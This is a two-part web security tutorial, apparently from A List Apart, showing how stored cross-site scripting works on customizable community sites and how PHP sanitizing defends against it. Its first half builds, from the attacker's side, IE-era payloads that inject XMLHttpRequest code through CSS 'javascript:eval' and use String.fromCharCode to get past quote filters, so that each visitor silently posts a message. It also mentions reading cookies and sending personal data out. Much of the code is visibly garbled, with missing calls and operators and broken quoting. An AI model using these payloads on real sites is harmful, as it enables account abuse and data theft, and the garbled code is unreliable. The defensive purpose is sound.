Community Creators, Secure Your Code! Part II

In part one of this two-part series, we discussed the threat of cross-site scripting in general terms and introduced a number of important security concepts. In part two, we’ll take a more in-depth, hands-on approach: How does an attacker actually exploit the weaknesses found? How can you protect yourself? For reasons of length, we’ll limit our discussion to two specific, representative examples.

Article Continues Below

Real-world examples#section2

Our examples are divided into three parts:

  1. The code—the XMLHttpRequest used to send data to or fetch data from the server,
  2. The scenario—injecting a guest book message, and
  3. The security test—our attempt to bypass various security measures.

The code#section3

Let’s start with the XMLHttpRequest code. This is basically the same in all our examples (this one is for POST, and is based on code by Drew McLellan on

function xmlhttp(){
// Branch for native XMLHttpRequest object
if( window.XMLHttpRequest ){
xmlhttp = new XMLHttpRequest();
// Branch for IE/Windows ActiveX version
} else if( window.ActiveXObject ){
  xmlhttp = new ActiveXObject( 'Msxml2.XMLHTTP' );
}catch( e ){
    xmlhttp = new ActiveXObject( iMicrosoft.XMLHTTP' );
  }catch( e ){}
/* The send variable, syntax:

 The content should be URL encoded
 if it contains special characters. Try */
send = 'variable1=content1&variable2=content2';

// URL to send it to
url = '';

// Function which the data returned is sent to
xmlhttp.onreadystatechange = nullfunction;

// POST 'POST', url, true );

// It's a form, use urlencode
xmlhttp.setRequestHeader( 'Content-type',
'application/x-www-form-urlencoded' );

// Calculate length
xmlhttp.setRequestHeader( 'Content-length',
send.length );

xmlhttp.setRequestHeader( 'Connection', 'close');

// Send
xmlhttp.send( send );

function nullfunction(){

/* Un-comment to debug (will show any 
 status 200 (OK) response  in an alert box) */
// if( xmlhttp.readyState  4 &&
//     xmlhttp.status  200 ){
//   alert( xmlhttp.responseText );
// }

Often, we aren’t interested in the window.XMLHttpRequest part, since many codes are based on IE’s poor CSS rendering. This code is pretty straightforward, and there are only a few parts of interest to us.

The send variable
This variable holds our form-data, content should be URL-Encoded if it contains any special character (space, etc.)
The url variable
This will be changed to the location of the PHP/ASP/SERVER script we wish to get data from or send data to.
This is set to the function we wish to invoke when the script is executed. In our examples we use nullfunction since we aren’t interested in getting any data in return. In more advanced examples we would then manipulate the data returned and break out the parts we needed. This could be used to fetch personal information (name, address, password) and send it to your server using one xmlhttp() to fetch the information and another to send it. method, url, asynchronous )
Method is set to either GET or POST depending on whether we are getting or sending, url is set to our URL (see #1). Asynchronous is set to true or false. If set to false, the browser will lock up until the response is received. We will set this to true, since we don’t want to risk alarming the user.

The scenario#section4

We’ll go through the following examples from an attacker’s point-of-view. The community we wish to manipulate is set up in a standard way: users can control the presentation of their user pages, and they can add friends and send messages, guest-book style. In our example, we will try to inject code into the presentation of our personalized user page that automatically sends a message to our guest book whenever another user visits our page. (This is essentially how the MySpace XSS attack worked.)

First, we look up the information we need: URLs, form information, etc. You can do this using Firefox’s built-in Form information, or you can just look in the source code.

We log in and navigate to the “add friends” page. We right-click and choose “View page info.” In the “Forms” tab of the recently opened dialog, we find the form information:

Form name: Form1
Method: POST
Form action: addmessage.php?id=3516

Form Form1:
Field name: private (Value: True)
Field name: message (Value: JS injected)
Field name: send    (Value: send)

Or we can get the same information by simply looking at the source code:

<form name="Form1" method="post" action="addmessage.php?id=3516">
<input name="private" type="text" value="true">
<input name="message" type="text" value="JS injected">
<input name="send" type="submit" value="send">

This is all we need, but what does it tell us? In order to inject the message, we will need to send the variables private (true or false, depending on if the message is private or not), message (A string, “JS injected” in our case) and send (value “send”) to the URL addmessage.php?id=3516.

We will need to edit the code to fit our needs:

function nullfunction(){
if( xmlhttp.readyState  4 &&
  xmlhttp.status  200){
// Branch for native XMLHttpRequest object
if( window.XMLHttpRequest ){
xmlhttp = new XMLHttpRequest();
// Branch for IE/Windows ActiveX version
}else if( window.ActiveXObject ){
xmlhttp = new ActiveXObject( ‘Msxml2.XMLHTTP’ );
}catch( e ){
  xmlhttp = new ActiveXObject( ‘Microsoft.XMLHTTP’ );
}catch( e ){}
send = ‘private=true&message=JS+injected&send=send’;
xmlhttp.onreadystatechange = nullfunction;
// Use our URL ‘POST’, ‘addmessage.php?id=3516’, true );
// It’s a form, use urlencode
xmlhttp.setRequestHeader( ‘Content-type’,
‘application/x-www-form-urlencoded’ );
xmlhttp.setRequestHeader( ‘Content-length’, send.length );
xmlhttp.setRequestHeader( ‘Connection’, ‘close’ );
// Send
xmlhttp.send( send );

Please note that since we want our code to execute on page load, we’ve extracted the XMLHTTPRequest from its function, leaving nullfunction the only function in use. For debugging purposes, we’ve added an alert to our nullfunction so that whatever is returned (the HTML code) by addmessage.php?id=3516 will be shown to us in an alert box.

Before we start, I’d like to give some tips on testing the code:

  • Use alert boxes to check where the code goes wrong.
  • Point the XMLHTTPRequest at a PHP (or ASP, etc.) file that simply echoes out the POST. In PHP, this would look like: <?php print_r( $_POST ); ?>
  • Use alert() to see the data being returned.

Injecting JavaScript#section5

Here comes the tricky part: bypassing the security measurements taken by the community creators. To do this, we use eval(), which will let us execute any JavaScript string. We do this by stripping the comments and carriage returns so it all ends up on one line:

eval('function nullfunction(){if( xmlhttp.readyState <redpre#6> 200 ){alert(xmlhttp.responseText);}}if( window.XMLHttpRequest ){xmlhttp = new <span class="caps">XML</span>HttpRequest();}else if( window.ActiveXObject ){ try{xmlhttp = new ActiveXObject( \’Msxml2.XMLHTTP\’ );}catch( e ){try{xmlhttp = new ActiveXObject( \’Microsoft.XMLHTTP\’ );}catch( e ){} }}send = \’private=true&message=JS+injected&send=send\’; xmlhttp.onreadystatechange = nullfunction; \’POST\’, \’js3.php\’, true );xmlhttp.setRequestHeader( \’Content-type\’, \’application/x-www-form-urlencoded\’);xmlhttp.setRequestHeader( \’Content-length\’, send.length );xmlhttp.setRequestHeader( \’Connection\’, \’close\’ );xmlhttp.send( send );’);

Now that we know what we wish to inject and have it neatly formatted in one line, we can start trying to bypass the filters.

Example #1: Injecting JavaScript with a locked style tag, single quotes allowed#section6

As stated in part one of this series, IE will treat the following statement as JavaScript (line wraps marked » —Ed.):

style="background:url(javascript: »

And also:

<div style="background:url(javascript:eval(alert(document.cookie)))">

However, since we have a mix of JavaScript, HTML, single quotes, and double quotes, escaping characters for eval can be tricky. Here are two guidelines:

  • In strings, single quotes must be escaped by two backslashes and by one semicolon (e.g.: myString = \\'value\\'\;).
  • In functions, single quotes must be escaped by one backslash (e.g. test(\'test\')\;) unless you are creating an object, then it must be escaped by two (e.g.: new ActiveXObject(\\'Msxml2.XMLHTTP\\')\;).

Using these guidelines, we’ll get the following code, and this is our (fully functional) end result:

<div style="background:url(javascript:eval('function nullfunction(){if( xmlhttp.readyState <redpre#9> 200 ){alert( xmlhttp.responseText );}}if( window.XMLHttpRequest ){xmlhttp = new <span class="caps">XML</span>HttpRequest();}else if( window.ActiveXObject ){try{xmlhttp = new ActiveXObject(\\’Msxml2.XMLHTTP\\’);}catch( e ){try{xmlhttp = new ActiveXObject(\\’Microsoft.XMLHTTP\\’);}catch( e ){}    }}send=\\’private=true&message=JS+injected&send=send\\’\;  xmlhttp.onreadystatechange=nullfunction\; \’POST\’, \’addmessage.php?id=3516\’, true )\;xmlhttp.setRequestHeader( \’Content-type\’, \’application/x-www-form-urlencoded\’ )\;xmlhttp.setRequestHeader( \’Content-length\’, send.length )\;xmlhttp.setRequestHeader( \’Connection\’, \’close\’ )\;xmlhttp.send( send )\;’))”>

Or, to break it down a little more prettily:

<div style="background:url(javascript:eval('
function nullfunction(){
if( xmlhttp.readyState  4 &&
    xmlhttp.status  200 ){
if( window.XMLHttpRequest ){
xmlhttp = new XMLHttpRequest();
}else if( window.ActiveXObject ){
  xmlhttp = new ActiveXObject( \\’Msxml2.XMLHTTP\\’ );
}catch( e ){
    xmlhttp = new ActiveXObject( \\’Microsoft.XMLHTTP\\’ );    
  }catch( e ){}

send= \\’private=true&message=JS+injected&send=send\\’\;
xmlhttp.onreadystatechange=nullfunction\; \’POST\’, \’addmessage.php?id=3516\’, true )\; 
xmlhttp.setRequestHeader( \’Content-type\’,
\’application/x-www-form-urlencoded\’ )\;
xmlhttp.setRequestHeader( \’Content-length\’, send.length )\;
xmlhttp.setRequestHeader( \’Connection\’, \’close\’ )\;

And that’s it; we’ve successfully injected our JavaScript code. Any visitor to our (the attacker’s) user page will automatically send us a guestbook message stating “JS Injected.”

Example #2: Injecting JavaScript with an unlocked style tag, single quotes forbidden#section7

First off, what is the difference between a “locked” and “unlocked” style tag?

If the community has an unlocked style tag, this code is valid:

<div ex1="" ex2="" ex3="" style="">

While a community that has locked it would remove ex1/ex2/ex3 since they are not on its white list. One could get around this, if the id tag is allowed, by simply creating lots of divs (<div id="ex1">code</div>) and using document.all.ex1.innerHTML. You would, however, have to “conceal” the code, since it would show up as HTML, which could make the user suspicious.

But let’s go back to the example; the community is stripping the single quote character. This makes it a lot trickier, since the code used in example #1 won’t work.

JavaScript without single and double quotes (since double quotes would collide with our style tag) is hard, but can be done. The idea is to use String.fromCharCode() and the ability to call for a customized part of a div (document.all.divid.part).

Using String.fromCharCode(39) will actually give us a single quote, but the following code is invalid:

<div style="background:url(javascript:eval(

Since we can’t mix string calls and functions as we do above.

Let’s start out slow, to get the feeling of fromCharCode() and its use. The following code will actually produce: eval(alert('test');):

<div ex0="alert(" ex1="test" ex2=");" id="mycode" 

This might look like Greek, but let’s break it down:

  1. document.all.mycode.ex0 will add the string in ex0, in this case the first side of the alert() method call, “alert(”.
  2. String.fromCharCode(39) will add the first single quote.
  3. document.all.mycode.ex1 will add the string in ex1, in this case the content of our alert(), “test.”
  4. String.fromCharCode(39) will add the second single quote.
  5. document.all.mycode.ex2 will add the string in ex2, in this case closing our alert()@ call, “);”.

Adding these up we get:

  1. alert(
  2. test
  3. );

Or, in one line:


Now that we understand how it works, we just have to remove the single quotes from our previous code, create the element’s custom attributes and then rewrite our eval() to insert the single quotes where we need them:

ex0="function nullfunction(){ if( 
xmlhttp.readyState  4 && xmlhttp.status  200 ){
alert( xmlhttp.responseText );}}if( window.XMLHttpRequest ){
xmlhttp = new XMLHttpRequest();
}else if( window.ActiveXObject ){
try{ xmlhttp = new ActiveXObject(” 
ex2=”);}catch( e ){try{xmlhttp = new ActiveXObject(” 
ex4=”);}catch( e ){}}}send =” 
ex6=”;xmlhttp.onreadystatechange = nullfunction;” 
ex8=”, ” 
ex10=”, true);xmlhttp.setRequestHeader(” 
ex12=”, ” 
ex14=”); xmlhttp.setRequestHeader(” 
ex16=”, send.length ); xmlhttp.setRequestHeader(” 
ex18=”, ” 
ex20=”); xmlhttp.send( send );”

This is our fully functional example number #2. This can be hell to debug though; make sure you format the code correctly from the start. If IE complains of weird errors—or doesn’t complain, but doesn’t execute—try putting the eval() string in an alert box and read the code manually. Look for 'undefined' or single quotes out of place)

Protecting yourself#section8

As described in part one of this series, you can sanitize your community site in several ways, depending on your needs and the level of your paranoia. (Please note that I will escape the following code for JavaScript only. If you intend to insert it in a database you might need to escape it properly even after this code. PHP has a functions for this such as mysql_real_escape_string().)

I am not presenting these code snippets as a complete solution; think of them as suggestions to get you started. While implementing strong security measures from the start is great, you’ll also need to keep yourself up-to-date—new exploits are found in browsers every day. Since I am a PHP developer, my code will be in PHP. Feel free to contribute codes in the language of your choice in the article’s discussion forums.

In our examples, we will use the string $string for simplicity. When JavaScript is found, we will call die("Possible JavaScript injection found"). This is not be a recommended solution for actual use; a more suitable approach would be to reject the code and show it to the user again, warning them against the use of JavaScript. You could also log the attempts.

A classical solution: search and block#section9

One way of protecting yourself is to search for patterns or words and simply reject it if there is a match. This is used by many to block out <script> tags.

if( preg_match( '/<script>/', $string ) ){
die( 'Possible JavaScript injection found' );

Or even simpler:

if( stripos( $string, '<script>' ) !== false ){
die( 'Possible JavaScript injection found' );

This might be one of the more attractive approaches due to its simplicity but I would not recommend anyone using it solely since you would need to find every possible way of injecting JavaScript (<script>, style tags, onClick, onLoad, javascript:eval() in URLs, etc.).

A new approach#section10

I’m paranoid; I like to try to be fully protected. In PHP, htmlentities() does this. It converts “all applicable characters to HTML entities.”

Here’s an example from

$str = "A 'quote' is <b>bold</b>";

# Outputs: A 'quote' is &lt;b&gt;bold&lt;/b&gt;
echo htmlentities($str);

# Outputs: A 'quote' is &lt;b&gt;bold&lt;/b&gt;
echo htmlentities($str, ENT_QUOTES);

There are several reasons I like to start with htmlentities(). I like to have a solid ground. If you use a blacklist to remove JavaScript and miss one your site is vulnerable. If you use htmlentities and forget one, you are not vulnerable; the worst-case scenario is that <b> doesn’t convert to bold.

From here we can go two ways; we can either let our users use custom tags such as [color] or we can let them use regular HTML tags. I will explore both of these options.

Custom tags#section11

This is the easiest way. We simply look for a tag and validate it. In our example we will take [color=#hex] text [/color] and convert it to <span style="color: #hex;"> text </span>. We want to allow the use of both #hex and names and we’ll use regular expressions to check it.

I use a program called The Regex coach to try regular expressions; it simplifies the process. I will be using preg_replace. I’ve started out with regular expressions in Perl for one of my projects and since then I’ve stuck with it. It works good and preg_replace is often faster then ereg_replace).

preg_replace() takes three arguments (pattern, replacement, and subject). Pattern is a Perl styled regular expression, replacement is the string to replace with and subject is our string. If you don’t have basic knowledge of regular expressions do a search on Google.

We will start by making a regular expression, these are the requirements to match:

  • If it is a hex code (starts with #) it should be 3 or 6 characters long and contain A-F and 0-9.
  • If it is a name we got two alternatives: Either we allow A-Z (3-7 characters long) or we specifically allow the sixteen colors in the W3C CSS standard.

We’ll use the first alternative for now. Let’s walk through the first regex together to refresh our memories:


  • Brackets and slashes need to be escaped by a backslash.
  • The variables we need are placed between parentheses as capture groups for later use (they get translated into $n where n is the number of the parentheses ($1, $2, $3)).

This gives us two capture groups to focus on:

1. (#[a-fA-F0-9]{3,6}|[a-zA-Z]{3,7})

This is divided into two parts (the string can match either one) by the | delimiter:

#[a-fA-F0-9]{3,6} tells us that it must start with # and continue with three to six characters (a-f and/or 0-9).

[a-zA-Z]{3,7} tells us that it must contain three to seven a-z characters. This could also be [aqua|black|blue|fuchsia|gray|green|lime|maroon |navy|olive|purple|red|silver|teal|white|yellow] since they are the sixteen allowed colors.

2. (.+) simply tells us it can match any character one or more times.

This gives us (line wraps marked » —Ed.):

$string = '[color=#000000] testing [/color]';
$string = htmlentities($string);
$pattern = "/\[color=([#]?[a-fA-F0-9]{3,6}| »
$replacement = "<span style=\"color: $1\">$2</span>";
$string = preg_replace( $pattern, $replacement, $string );

White lists#section12

White lists are a bit trickier, and I am sure there are several different solutions for this. In mine I will use arrays containing the allowed variables. If you are looking for more examples try the comment section of preg_replace. As you probably know, there’s more than one way to do things. There may indeed be a better way to write this, but the code below should at least get you started.

In this example we will define what HTML tag and CSS styles are allowed. In my example I will let my users use the following HTML tags: strong, span, and div. The following styles will be allowed: font-weight, font-family, font, background, background-color, and color. (line wraps marked » —Ed.)

// Our string to process
$string = '<strong>Line1</strong><br /> »
<div style="color: grey;">Grey text</div> »
<span style="color:#999;font-family:verdena;"> »
Span Example</span> »

# Since I am paranoid I will use htmlentities() from the start,
$string = htmlentities($string);

$allow = array('strong', 'div', 'span', 'br \/');

/* On my example site we will allow certain style properties
 These are divided into two parts:
   1. A-Z 0-9 input
   2. Colors
 This is simply to show two different RegExs. */

$cssaz     = array( 'font-weight', 'font-family', 'font' );
$csscolor = array( 'background', 'background-color', 'color' );

foreach( $allow as $tag ){
/* The regex is quite simple once you get used to
   the htmlentitied data
   Basically, it checks for <tag (style="")> */
$string = preg_replace_callback( »
'/\&lt\;('.$tag.')([\s]+style=\&quot\; »
([a-z0-9\,\;\:\-\s\#]+)\&quot\;[\s]*)?\&gt\;/i', »
'cleanit', $string );

$string = preg_replace( '/\&lt\;\/('.$tag.')\&gt\;/i',
                 "</$1>", $string);

# echo the processed string
echo $string;

/* Our callback function that will check if our HTML tag 
 has style tags attached to it. If it has we must make 
 sure it contains only the allowed styles. */

function cleanit( $array ){
global $cssaz, $csscolor;
/* If the array contains more than 2 indexes
   the style parantheses matched. */
if( count( $array ) > 2 ){
  # $array[3] is the content of the style tag.

  /* Below is a basic check for javascript (or actually,  
     just the 'java' part). This can be used if you want 
     to log attempts etc. */
  if( strpos($array[3], 'java') !== false )
    return "<$array[1]>$array[4]</$array[1]>";

  /* As I've already pointed out, we are working with white 
     lists instead of black lists. Instead of checking for
     disallowed styles, you check for allowed. */

  # Trim whitespace
  $array[3] = str_replace(' ', '', $array[3]);

  # Do we have a ending semicolon? If not, add it.
  if( substr( $array[3], -1 ) !== ";" )
    $array[3] .= ";";

  /* We use preg_match_all to look for matches and return  
     them to the array $matches */
  preg_match_all( '/('.implode($cssaz,'|').'): »
([a-z0-9\s\,\.]+);/', $array[3], $matchesaz );

  # Match colors too...
  preg_match_all( '/('.implode($csscolor,'|').'):([#]? »
$array[3], $matchescolor );

  /* When preg_match_all returns an array 
     0 is the matches string, 1 is our first 
     parenthesis and 2 is our second.
     We want the entire match */

  # Return the htmlcode
  return "<$array[1] style=\"".implode( $matchesaz[0], " " ).
    "  ".implode( $matchescolor[0], " " )."\">";

  return "<$array[1]>";


Part one of this series focused on theory, while part two provided a more hands-on look at methods of attacking customizable sites—and protective measures. By now, you should have gotten your hands dirty with some JavaScript and gained more knowledge into how XSS attacks work and how you can protect yourself from them.

About the Author

Niklas Bivald

Niklas Bivald (LinkedIn, GitHub) is a tech guy at heart. He loves creative use of data. His passion is the belief that teach and creativity are like milk and cookies—not opposites. He's a long time lecturer with background from tech companies such as Spotify and various agencies.

12 Reader Comments

  1. When you use custom tags you tend to store the result in the database as HTML, so the conversion doesn’t need to take place every time the data is displayed.

    However, this means you need a function to turn the HTML back into custom tags if the user wishes to edit their data.

    When a user submits their data, I run the HTML-to-custom function, then htmlentities(), then the custom-to-HTML.

    This means that the user can use simple HTML in their post and custom tags. The safe HTML will be converted to custom tags before the rest of the HTML is escaped.


  2. An alternative to storing the content as HTML in the database would be to store the content as your custom code in the database and to generate a static page from it that is served until the content is published again. Yes, this would double the data storage from generating pages dynamically, but it would have the same total storage as a page being cached on your server (which you are probably doing anyway on any site that is either large or has high traffic). It also builds in a natural backup to your data – which is a good thing.

  3. A thought: if you removed all forms of open-parenthesis from any place where code could be executed, would this be enough to nix most Javascript?

    _'(‘ ‘%28’ ‘&#040;’ ‘&#x28;’ etc._

  4. If your going to chop out all the single and double quotes howz about also looking for ‘fromCharCode’ and killing that as well? Might even put ‘XMLHttpRequest’ and ‘ActiveXObject’ on the black list. You could actually just put all the JavaScript keywords on the black list which are known and limited. Black lists are only a bad idea when the potential threat is unlimited. Given that Javascript is a well know and finite language…?

    Oh Christopher, I think if you took away the parenthesis you would stop all the url() stuff in CSS which might be desirable. Of course killing all the quotes stops ‘content:’ in CSS as well (but who cares IE doesn’t support it).


  5. Well, blacklisting is ok for the known problems, but if you have thousands of user comments and you don’t know yet what bugs the next IE will contain, then a generic approach would be better. I like the idea of just not allowing single and double quotes, since this stops most intrusion approaches and is easy to implement. I just have to find some time…

  6. I have no doubt gained more knowledge into how XSS attacks work and how to protect myself from them in the furute from your series, when I first came accross the article I thought you were referring to patenting your code but was pleased to find your article on the above topics.But I to agree with Andreas blacklisting would be great problem solver as well, and getting a master list is pretty easy my favorite is Jay Allens

  7. I like the simple approaches best, can’t imagine any site owner needing to worry about going deeper. In the past I’ve implemented a more robust solution but it required a recursive regex function which wasn’t too friendly on CPU cycles. I don’t plan on using it again.

  8. If you are target of attacks, I would prefer to secure the community by whitelisting. Especially when you think about future bugs in browsers. When the rules are built the whitelist is easy to administrate.

  9. I think there is nothing more efficient than encoding your pages using one of any encoding software available, such as ionCube PHP encoder. That’s just one of many. I can’t imagine more secure, protective way than this.

  10. Im with Thorsten. I think whitelisting is the best and safest way ever. Nobody needs so much custom tags and if you only allow a few tags, its no problem to handle it.

Got something to say?

We have turned off comments, but you can see what folks had to say before we did so.

More from ALA